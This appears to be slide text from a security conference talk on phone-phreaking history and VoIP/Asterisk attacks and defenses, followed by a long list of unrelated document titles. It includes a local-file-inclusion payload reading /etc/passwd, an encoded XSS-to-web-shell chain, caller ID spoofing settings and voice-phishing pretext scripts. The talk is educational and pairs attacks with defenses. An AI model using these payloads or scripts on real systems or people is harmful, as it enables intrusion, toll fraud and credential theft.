1 Mysteries of the Phone System Past and Present Patrick
2 Views and opinions are those of Patrick & Owen and do not represent past, present, or future employers. All Service Marks, Trademarks, and Copyrights belong to their respective owners.
3 "Get this and get it straight Crime is a sucker s road, and those who travel it wind up in the gutter, the prison, or the grave." -Opening of the Philip Marlowe radio show The Original Philip Marlowe - Humphrey Bogart from The Big Sleep,1946 (46 / 2 = 23)
4 Why are we doing this? Phreaks as the original electronics hackers It s a way of thinking... VoIP wasn t designed for security Mysteries of the past can help you understand the present - let us be your guide
5 What we ll cover History Info Leakage Exploitation Fraud & Abuse PoC Tool Demo Other Which may include famous movie stars and propaganda
7 User Dialing Strowger switch - alternating current pulses & mechanical cylinder switch per digit First user dialing enabled - exchange name converted to number to dial in small area
8 Carrier Growth Drives Innovation Burgeoning operator workforce growth Panel & Crossbar common control built number in sender then processed The 4A crossbar and card control It s TRUE mom, the DEF CON Goons are SO dreamy! POP QUIZ! Q: SF and MF - what tone critical? XXXX Hz? Q: What was the design flaw that revolutionized the industry?
11 Introducing Asterisk! Asterisk Created in Now developed by Digium - GPL - Latest Stable: (24 October 2014; 4 months ago) (20 October 2014; 4 months ago) Numerous Books published Building Telephony Systems with Asterisk (PACKT) Asterisk for dummies published Asterisk Hacking published - AsteriskBook (AsteriskDocs.org) AMI AGI (http://www.voip-info.org/wiki/view/asterisk+agi) You can do some cool stuff with it.
12 Asterisk variants... FreePBX TrixBox PBX In a Flash Elastix AskoziaPBX Asterisk for Raspberry Pi (http://www.raspberry-asterisk.org/) Olivia de Havilland in The Dark Mirror, 1946 (46 / 2 = 23)
14 Attack vs Defense Al Capone J Edgar Hoover
15 Information Leakage What: When a system that is designed to be used only by authorized parties reveals the usage, equipment, location, or entities using the system, etc. to an unauthorized party.
16 Rise of the Phreaks Phreaks: Social engineered operators Phone techs In-band clicks & tones Open technical journals Exhaustive dialing of numbers Shared on looparounds & eventually conf calls Underground papers
17 The World Finds Out Secrets of the Little Blue Box, 1971 Esquire article introduced world to Phreaking - such as Joe Engressia, Mark Bernay, and John Draper Phun stuff like joke-lines were a ToS violation See Exploding the Phone by Phil Lapsley Photo taken from wideweb.com/phonetrips
18 Evolution of VoIP Common Channel Interoffice Signaling (CCIS) Personal computers came out, and if switches can use modems IP enabled transport of ALL data, including voice Analog systems got IP cards All IP developed PBX, with separate gateways for analog connections, consumer MTAs with analog ports, etc. Virtualization made PBX accessible to all
19 Information Leakage Now: Still just as easy! The curious can play in a VM at home or get inexpensive trunk services. Just like early phreakers - read, listen, enumerate! Port scanning SIP stack & OS fingerprinting Extension enumeration
21 The Crypto That Time Forgot REGISTER sip: SIP/2.0 Via: SIP/2.0/UDP :8166;branch=z9hG4bK-d8754z- 0be76a4b680f d8754z-;rport Max-Forwards: 70 Contact: To: From: Call-ID: YWM4NWQxNThiNGEwMjhmYTJhZmIwYzJiNjMxNTY1MjE CSeq: 2 REGISTER Expires: 3600 Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, NOTIFY, MESSAGE, SUBSCRIBE, INFO User-Agent: X-Lite f3e8e-W6.1 Authorization: Digest username="1000",realm="asterisk",nonce="35e47ee9",uri="sip: ", response="33ac377e4d50ad ef37b2d33ce",algorithm=md5 Content-Length: 0
22 Information Leakage Google searches, DNS queries, job boards, and calls that go to voic or auto-attendant may the type of phone system If Internet connected, a quick SIP OPTIONS or INVITE reveals key info. User-Agent, Server, X- headers, or other header presence (or lack of) tells me what you re running. User or extension enumeration A quick vuln database scan tells me how to try to compromise your system
23 SIP VoIP info gathering tips Port scans - specify TCP & UDP, along with a port range to detect Asterisk AMI (5038) - outside of nmap defaults Scan slow to avoid rate based filters (-T) Use more than one tool, & mod default values. Ex: If using SIPVicious change default User-Agent in svhelper.py Scan with another SIP method such as INVITE or CANCEL Metasploit SIP scanner randomizes identifying fields Not many VoIP scanner projects maintained, but Viproy and Bluebox-ng ARE
24 Asterisk User-Agents 15MM SIP entries in dataset 52,420 containing Asterisk 10,776 are just Asterisk PBX (top server UA in the list) 1,156 "Asterisk PBX FONCORE-r78" - TrixBox! As expected, LOTS of: Insecure phones & MTAs Old SMB systems from Cisco, Nortel, Avaya, etc. Unexpected Finds: NORTEL-DMS100-SS7-ISUPbr (?!) 5,785 hits on camera, 5467 in CN Top user-agent - 3.6MM FRITZ!OS MTAs deployed in DE LOTS of Huawei in Iran Special thanks to Daniel Abreu for help with ZMap data import to ElasticSearch w/kibana
25 Information Leakage Defense Change the default SIP User-Agent string to fool attackers o In asterisk change sip_general_additional.conf useragent= o Or in FreePBX Web GUI > Settings > Asterisk SIP Settings > Go to Other SIP settings at bottom and enter useragent and <value you want> Block bad user agents & use rate limiting (See our Github) Add alwaysauthreject=yes to sip_custom.conf & username <> extension Implement fail2ban to block IPs that o Try to register to invalid extensions o Have a number of registration failures o Exceed a reasonable message rate Use a security appliance that will block SIP scans
26 Exploitation ex ploi ta tion (ĕk sploi-tā shən) n. 1. The act of employing to the greatest possible advantage 2. Utilization of another person or group for selfish purposes
27 Exploitation The phreaks used the weaknesses in the phone network to their greatest advantage, and used them to enable further exploration.
28 Exploitation Nowadays. used for Pretty much anything
29 TrixBox Immensely popular Asterisk front end SourceForge Stats: 5.0 Stars (35) Last Update: (More Stats)
30 Vulnerabilities Year DoS Code Execution Overflow Sql Injection Bypass something Gain Information Gain Privileges # of exploits # of Vulnerabilities Total Memory Corruption, XSS, Directory Traversal, HTTP Response Splitting, CSRF and File Inclusion not included in chart
32 Exploitation Demo Local File Inclusion /maint/modules/home/index.php?lang=../../../../../../../../etc/passwd%00 Other interesting files to read (Other than your normal goto files) Asterisk Configs (/etc/asterisk/) users.conf voic .conf extensions.conf Many More Amp Portal Config /etc/amportal.conf Asterisk Logs /var/log/asterisk - By AttackTerrorist
35 LFI Remote Code Exec Demo LFI & XSS By AttackTerrorist - SIP Message Injection By Snide.
36 Exploitation Demo Putting it all Together. From XSS (UNAUTH)->RCE (AUTH) Requires info gathering (maybe) Possibly phishing, hidden frames. Excuse Me Sir? user/help/html/index.php?id_nodo=%22onmouseover%3dwindow.location.replace%28window.atob%28%27ah R0cDovLzE5Mi4xNjguMS41MC9tYWludC9tb2R1bGVzL2hvbWUvaW5kZXgucGhwP2xhbmc9TUY7ZWNo byaipd9wahagc3lzdgvtkfwkx0dfvftcimntzfwixsk7pz4ipnnozwxsni5waha=%27%29%29;%22" 1) Load Page with iframe src above 2) Use the XSS to trigger onmouseover (in frame) to load Base64 Encoded URL: "<?php system(\$_get['cmd']);?>">../../../shell6.php 3) Hide Frame LFI & XSS By AttackTerrorist
39 Exploitation Defense Defending isn t easy 1. Avoid all-in-one distributions 2. Update 3. Custom build It s not hard Don t build what you don t need 4. Configure Properly Turn off what isn t used, needed or unknown See #3 5. Firewall 6. Fail2ban
40 Fraud & Abuse What: No intention to pay Causes loss or damage to others or enables criminal to make a profit Manipulation of the telecommunications network to make it do something unintended for fun :)
41 Fraud & Abuse Q: Before Apple, what did electronic device made Steve Wozniak and Steve Jobs famous (or maybe notorious) in some circles? Q: Who were some of the earliest and largest users of blue boxes besides phreaks? Q: Besides blue boxes, name one other box type that was very popular. What did it do? Q: What feat focused the FBI on apprehending John Draper aka Capt. Crunch?
42 Fraud & Abuse Making money - IRSF, traffic pumping schemes enabled by cracked PBX o Call generation or forwarding, voic dialout, routing changes, etc. to make calls to high-cost destinations Caller ID spoofing ( backspoofing ) Telephony Denial of Service - scripted calls to tie up someone s phone for extortion, protest, or prank Vishing Voice phishing, phone schemes, sometimes robo-dialed
43 Fraud & Abuse Demo Faked caller number. CNAM lookup or dip by receiver s telco displays name registered to that number - aka backspoofing Prank Calls Social Engineering Bypass some voic pins SWATting
44 Asterisk CallerID Setting On outbound route in extensions.conf exten => _1NXXNXXXXXX,n,Set(CALLERID(num)= ) In the.call files used for automation just set... CallerID: < >
45 Hey, Look who s calling me!
46 Phreakme We were just acquired. For security reasons, please enter your voic pin for a message from the CEO. A new tech support fast track phone number verification system is being rolled out. You must be enrolled for faster help desk service. Please enter your date of birth, in month, day and four digit year for verification.
47 Phreakme Demo
48 Phreakme IVR Configure Phreakme calling number & SIP trunk (in asterisk & PHP) Set up a phishing recording - create the pretext Create a target list - the phone numbers Do a dry-run of the recording Run the campaign
49 Phreakme - Why do I care? If I get your VM password - depending on system permissions Forward calls to high cost destinations Make new calls Broadcast internal messages Listen to VM (corp espionage?) DOB, SSN or other numeric info for password reset? Credit card into?
50 Fraud & Abuse Defense Credential cracking protections Block international destinations that are in NANP besides just 011 Disable call forwarding, and only allow it selectively Do not allow voic and conf bridge dialout and voic auto-dialback See what protections your provider has - bill limits, per-minute limits, destinations, etc.
51 Fraud & Abuse Defense Set pins on LD trunks TLS & SRTP - At least make it harder. Cert mgt is hard, but even one org cert on a client helps. Use GOOD algorithms, and stay patched. Look for security or fraud mgt systems that learn traffic baselines and watch for changes in rate, ratio, frequency, and/or direction of calls
54 Current Foreign NPAs (for U.S.) 264 ANGUILLA 268 ANTIGUA/BARBUDA 242 BAHAMAS 246 BARBADOS 441 BERMUDA 284 BRITISH VIRGIN ISLANDS 345 CAYMAN ISLANDS 767 DOMINICA 809 DOMINICAN REPUBLIC 829 DOMINICAN REPUBLIC 849 DOMINICAN REPUBLIC 473 GRENADA 658 JAMAICA 876 JAMAICA 664 MONTSERRAT 721 SINT MAARTEN 869 ST. KITTS AND NEVIS 758 ST. LUCIA 784 ST. VINCENT & GRENADINES 868 TRINIDAD AND TOBAGO 649 TURKS & CAICOS ISLANDS
A Taxonomy of VoIP Security Threats An outline of the security threats that face SIP based VoIP and other real-time applications Peter Cox CTO Borderware Technologies Inc VoIP Security Threats VoIP Applications
VoIPhreaking How to make free phone calls and influence people by the grugq Agenda Introduction VoIP Overview Security Conclusion Voice over IP (VoIP) Good News Other News Cheap phone calls Explosive growth
Finding VoIP vulnerabilities while you sleep Background info on VoIP and previous research Introduction to VoIPER Description of some of its features Some demos and usage examples The results of my testing
Asterisk with Twilio Elastic SIP Trunking Interconnection Guide using Secure Trunking (SRTP/TLS) With the Introduction of Twilio Elastic SIP trunking this guide provides the configuration steps required
Page 1 of 6 TECHNICAL SUPPORT NOTE 3-Way Call Conferencing with Broadsoft - TA900 Series Introduction Three way calls are defined as having one active call and having the ability to add a third party into
Hacking SIP Services Like a Boss Fatih Özavcı Information Security Researcher & Consultant fatih.ozavci at viproy.com viproy.com/fozavci #direngezi 2 #direngezi 3 #direngezi 4 About Me Information Security
VoIP Wars : Return of the SIP Fatih Özavcı Information Security Researcher & Consultant fatih.ozavci at viproy.com viproy.com/fozavci # whois Information Security Consultant @ Viproy / Turkey 10+ Years
IPCom Gesellschaft für internetbasierte Kommunikationsdienste mbh Analysis of a VoIP Attack Klaus Darilion, IPCom GmbH, firstname.lastname@example.org Abstract: Recently, several IT news websites reported VoIP
VoIP some threats, security attacks and security mechanisms Lars Strand RiskNet Open Workshop Oslo, 24. June 2009 "It's appalling how much worse VoIP is compared to the PSTN. If these problems aren't fixed,
Three-Way Calling using the Conferencing-URI Introduction With the deployment of VoIP users expect to have the same functionality and features that are available with a landline phone service. This document
ASTERISK SIP Trunking using Optimum Business SIP Trunk Adaptor and the Asterisk IP PBX Version 1.2.10 Goal The purpose of this configuration guide is to describe the steps needed to configure the Asterisk
Vulnerabilities in SOHO VoIP Gateways Is grandma safe? Peter Thermos email@example.com firstname.lastname@example.org 1 Purpose of the study VoIP subscription is growing and therefore security
Penetration Testing with Kali Linux PWK Copyright 2014 Offensive Security Ltd. All rights reserved. Page 1 of 11 All rights reserved to Offensive Security, 2014 No part of this publication, in whole or
Transparent weaknesses in VoIP Peter Thermos email@example.com 2007 Palindrome Technologies, All Rights Reserved 1 of 56 Speaker Background Consulting Government and commercial organizations,
Grandstream Networks, Inc. GXP2130/2140/2160 Auto-configuration Plug and Play Introduction: This is a technical guide targeted to PBX developers that want to learn the different mechanisms that GXP2130/2140/2160
SIP ALG is a parameter that is generally enabled on most commercial router because it helps to resolve NAT related problems. However, this parameter can be very harmful and can actually stop SIP Trunks
A Guide to Connecting to FreePBX FreePBX is a basic web Graphical User Interface that manages Asterisk PBX. It includes many features available in other PBX systems such as voice mail, conference calling,
Web Application Threats and Vulnerabilities Web Server Hacking and Web Application Vulnerability WWW Based upon HTTP and HTML Runs in TCP s application layer Runs on top of the Internet Used to exchange
What is SIP? What s a Control Channel? History of Signaling Channels Signaling and VoIP Complexity Basic SIP Architecture Simple SIP Calling Alice Calls Bob Firewalls and NATs SIP URIs Multiple Proxies
SIP Trunking Installations General Guidelines for SIP Trunking Installations 1) How do I setup my SIP trunk for inbound/outbound calling? We authenticate IP-PBX SIP Trunking traffic by: IP Authentication
OfficeMaster Gate (Virtual) Enterprise Session Border Controller for Microsoft Lync Server Quick Start Guide October 2013 Copyright and Legal Notice. All rights reserved. No part of this document may be
General Guidelines for SIP Trunking Installations 1) How do I setup my SIP trunk for inbound/outbound calling? We authenticate IP-PBX SIP Trunking traffic by: IP Authentication (IP address) or Digest Authentication
Penetration Testing SIP Services Using Metasploit Framework Writer Version : 0.2 : Fatih Özavcı (fatih.ozavci at viproy.com) Introduction Viproy VoIP Penetration Testing Kit Sayfa 2 Table of Contents 1
How to Setup Your Voice Mail Enter your Voice mail access code (see below) from your home phone. Enter password (default is 0000) and press #. The voice mail prompts you to select your language preference.
1) How do I setup my SIP trunk for inbound/outbound calling? We authenticate IP-PBX SIP Trunking traffic by: IP Authentication (IP address) or Digest Authentication (account and SIP password) After you
Avaya Solution & Interoperability Test Lab Application Notes for Configuring SIP Trunking between McLeodUSA SIP Trunking Solution and an Avaya IP Office Telephony Solution 1.0 Abstract These Application
TOLL FRAUD POLICIES AND PREVENTION What is Toll Fraud? Toll Fraud is the theft of long-distance service. It s the unauthorized use of phone lines, services or equipment to make long distance calls. When
Attack Sandro Gauci Difficulty VoIP is a hot and steadily gaining market share in the phone business. As people constantly seek to make long distance calls cheaper, they are moving away from relying on
Fonality Optimum Business Trunking and the Fonality Trixbox Pro IP PBX Standard Edition V4.1.2- p13 Configuration Guide Fonality Table of Contents 1. Overview 2. SIP Trunk Adaptor Set-up Instructions 3.
Is Drupal secure? A high-level perspective on web vulnerabilities, Drupal s solutions, and how to maintain site security Presented 2009-05-29 by David Strauss Thinking Securely Security is a process, not
Network Working Group Request for Comments: 4579 BCP: 119 Category: Best Current Practice A. Johnston Avaya O. Levin Microsoft Corporation August 2006 Status of This Memo Session Initiation Protocol (SIP)
Avaya Solution & Interoperability Test Lab Application Notes for IDT Net2Phone SIP Trunking Service with Avaya IP Office 8.1 - Issue 1.0 Abstract These Application Notes describe the procedures for configuring
SIP Basics CSG VoIP Workshop Dennis Baron January 5, 2005 Page 1 Outline What is SIP SIP system components SIP messages and responses SIP call flows SDP basics/codecs SIP standards Questions and answers
Where every interaction matters. Peer 1 Vigilant Web Application Firewall Powered by Alert Logic The Open Web Application Security Project (OWASP) Top Ten Web Security Risks and Countermeasures White Paper
PBX Fraud Information Increasingly, hackers are gaining access to corporate phone and/or voice mail systems. These individuals place long distance and international calls through major telecom networks
Learn Ethical Hacking, Become a Pentester Course Syllabus & Certification Program DOCUMENT CLASSIFICATION: PUBLIC Copyrighted Material No part of this publication, in whole or in part, may be reproduced,
Client logo placeholder XXX REPORT Page 1 of 37 Report Details Title Xxx Penetration Testing Report Version V1.0 Author Tester(s) Approved by Client Classification Confidential Recipient Name Title Company
NetVanta Unified Communications Technical Note The Purpose of a SIP-Aware Firewall/ALG Introduction This technical note will explore the purpose of a Session Initiation Protocol (SIP)-aware firewall/application
HACKING EMBEDDED DEVICES for Fun & Profit WHAT THIS TALK INTENDS TO COVER! What & Where are Embedded Devices? Why history lessons should be learnt! Caveats & Defects in Embedded Platforms Methodologies
6 Steps to SIP trunking security How securing your network secures your phone lines. The myths about SIP trunking can be misleading. There are stories that SIP has set off a cyber crime wave of corporate
What is an? s Ten Most Critical Web Application Security Vulnerabilities Anthony LAI, CISSP, CISA Chapter Leader (Hong Kong) firstname.lastname@example.org Open Web Application Security Project http://www.owasp.org
Avaya Solution & Interoperability Test Lab Application Notes for Avaya IP Office 7.0 Integration with Skype Connect R2.0 Issue 1.0 Abstract These Application Notes describe the steps to configure an Avaya
COURSE NAME: INFORMATION SECURITY INTERNSHIP PROGRAM Course Description This is the Information Security Training program. The Training provides you Penetration Testing in the various field of cyber world.
VoIP Security Methodology and Results NGS Software Ltd Barrie Dempster Senior Security Consultant email@example.com Agenda VoIP Security Issues Assessment Methodology Case Study: Asterisk VoIP Security
VOIP SECURITY: BEST PRACTICES TO SAFEGUARD YOUR NETWORK ====== Table of Contents Introduction to VoIP Security... 2 Meet Our Expert - Momentum Telecom... 2 BroadWorks... 2 VoIP Vulnerabilities... 3 Call
IP Office 4.2 SIP Trunking Configuration Guide AT&T Flexible Reach and AT&T Flexible Reach with Business in a Box (SM) Issue 1.0 (8 th October 2008) 2008 Avaya Inc. All Rights Reserved. Notice While reasonable
Voice over IP VoIP (In) Security Presented by Darren Bilby NZISF 14 July 2005 Security-Assessment.com Who We Are NZ s only pure-play security firm Largest team of security professionals in NZ Offices in
How to break in Tecniche avanzate di pen testing in ambito Web Application, Internal Network and Social Engineering Time Agenda Agenda Item 9:30 10:00 Introduction 10:00 10:45 Web Application Penetration
The feature allows embedded messages of the Session Initiation Protocol (SIP) passing through a device that is configured with Network Address Translation (NAT) to be translated and encoded back to the
Using Nessus In Web Application Vulnerability Assessments Paul Asadoorian Product Evangelist Tenable Network Security firstname.lastname@example.org About Tenable Nessus vulnerability scanner, ProfessionalFeed
Avaya IP Office 4.0 Customer Configuration Guide SIP Trunking Configuration For Use with Cbeyond s BeyondVoice with SIPconnect Service Issue 2.2 06/25/2007 Page 1 of 41 Table of contents 1 Introduction...8
Grandstream Networks, Inc. GVC3200/GVC3200 Conferencing System for Android TM Application Note: Preliminary Interoperability Test between GVC3200/GVC3200 and Other Video Conference Systems Index INTRODUCTION...
CRYPTUS DIPLOMA IN IT SECURITY 6 MONTHS OF TRAINING ON ETHICAL HACKING & INFORMATION SECURITY COURSE NAME: CRYPTUS 6 MONTHS DIPLOMA IN IT SECURITY Course Description This is the Ethical hacking & Information
Session Initiation Protocol oco (SIP) Part II Prof. Ai-Chun Pang Graduate Institute of Networking and Multimedia, Dept. of Comp. Sci. and Info. Engr., National Taiwan University Email: email@example.com
For Firmware Version: V2.0/V3.0 2013-12-11 Contents 1. IPPBX Access... 3 1.1 How to access IPPBX via SSH?... 3 1.2 How to access IPPBX if I forget the IP of WAN?... 4 1.3 How to retrieve WEB password via
IVY is our complete control panel for managing you or your customers SIP trunks and hosted PBX settings. This guide will help you get up and running with IVY as quickly as possible. First thing we need
Schmooze Com Inc. Chapters Overview Logging In Adding a SIP Trunk Adding a DAHDi Trunk Adding an IAX2 Trunk Adding an ENUM Trunk Adding a DUNDi Trunk Adding a Custom Trunk Recap Examples Overview The Trunks
WHITE PAPER FortiWeb and the OWASP Top 10 PAGE 2 Introduction The Open Web Application Security project (OWASP) Top Ten provides a powerful awareness document for web application security. The OWASP Top
Ron Shuck, CISSP, CISM, CISA, GCIA Infrastructure Security Architect Spirit AeroSystems VOIP Components Common Threats How Threats are Used Future Trends Provides basic network connectivity and transport
ARCHITECTURES TO SUPPORT PSTN SIP VOIP INTERCONNECTION 10 April 2009 Gömbös Attila, Horváth Géza About SIP-to-PSTN connectivity 2 Providing a voice over IP solution that will scale to PSTN call volumes,
Security analysis of the implications of deploying Cisco Systems SIP-based IP Phones model 7960 Ofir Arkin Founder The Sys-Security Group firstname.lastname@example.org http://www.sys-security.com September 2002
SIP Essentials Training 5 Day Course Lecture & Labs COURSE DESCRIPTION Learn Session Initiation Protocol and important protocols related to SIP implementations. Thoroughly study the SIP protocol through
Grandstream Networks, Inc. Interoperability Tutorial: Configuring UCM6100 Series with FreePBX Grandstream Networks, Inc. www.grandstream.com FreePBX is a Registered Trademark of Schmooze Com, Inc. Index
Schmooze Com Inc. Chapters Overview Logging In & Adding a Key Account Settings Route & Trunk Configuration DID Configuration Recap Overview The SIPSTATION module, when combined with a SIPSTATION SIP Trunk
Setup Guide: on the MyNetFone Service Revision History Version Author Revision Description Release Date 1.0 Sampson So Initial Draft 02/01/2008 2.0 Sampson So Update 27/09/2011 1 Table of Contents Introduction...
SIP: Session Initiation Protocol Signaling Protocol Review H323: ITU peer:peer protocol. ISDN (Q.931) signaling stuffed into packets. Can be TCP or UDP. H225: Q931 for call control, RAS to resolve endpoints
Merging Old and New Telephony with Asterisk Greg Vance Digium, Inc. email@example.com Asterisk a Global Phenomenon Digium Confidential Digium Confidential What is Asterisk? platform The world s from which
SS7 & LTE Stack Attack Ankit Gupta Black Hat USA 2013 firstname.lastname@example.org Introduction With the evolution of IP network, Telecom Industries are using it as their core mode of communication for their network
Kerio Operator Getting Started Guide 2011 Kerio Technologies. All rights reserved. 1 About Kerio Operator Kerio Operator is a PBX software for small and medium business customers. Kerio Operator is based
EE4607 Session Initiation Protocol Michael Barry email@example.com firstname.lastname@example.org Outline of Lecture IP Telephony the need for SIP Session Initiation Protocol Addressing SIP Methods/Responses Functional
Table of Contents Device SIP Trunking Administrator Manual Version 20090401 Table of Contents... 1 Your SIP Trunking Service... 2 Terminology and Definitions... 2 PBX, IP-PBX or Key System... 2 Multi-port
Understanding Security Testing Choosing between vulnerability assessments and penetration testing need not be confusing or onerous. Arian Eigen Heald, M.A., Ms.IA., CNE, CISA, CISSP I. Introduction Many